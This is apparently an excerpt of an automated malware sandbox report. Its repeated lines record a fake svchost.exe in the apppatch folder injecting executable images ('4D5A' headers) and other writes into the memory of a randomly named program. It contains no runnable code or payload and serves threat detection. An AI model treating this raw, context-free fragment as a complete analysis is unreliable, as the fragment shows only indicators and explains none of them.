Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1452000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: CF2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: ED2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1162000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 13A2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 862000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: BF2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1062000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1252000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1272000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 11B2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: D12000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 802000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 862000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 792000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 15A2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: F62000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: CD2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1252000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: B62000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: EC2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1022000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: E62000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1342000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: FD2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: D02000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: FE2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: A92000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: FF2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 8D2000 value starts with: 4D5AJump to behavior
Writes to foreign memory regions
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: E50000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: E51000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: E52000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: EA5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: BE0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: BE1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: BE2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: C35000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1000000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1001000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1002000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1055000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: CE0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: CE1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: CE2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: D35000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1280000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1281000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1282000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 12D5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1530000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1531000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1532000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1585000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: A40000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: A41000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: A42000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: A95000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1200000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1201000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1202000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1255000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 10B0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 10B1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 10B2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1105000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1290000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1291000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1292000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 12E5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 6A0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 6A1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 6A2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 6F5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: AE0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: AE1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: AE2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: B35000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: ED0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: ED1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: ED2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: F25000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: B70000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: B71000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: B72000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: BC5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: CE0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: CE1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: CE2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: D35000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 590000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 591000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 592000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 5E5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1630000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1631000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1632000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1685000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: A60000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: A61000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: A62000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: AB5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 8D0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 8D1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 8D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 925000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1040000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1041000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1042000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1095000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: CC0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: CC1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: CC2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: D15000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: AA0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: AA1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: AA2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: AF5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1110000Jump to behavior
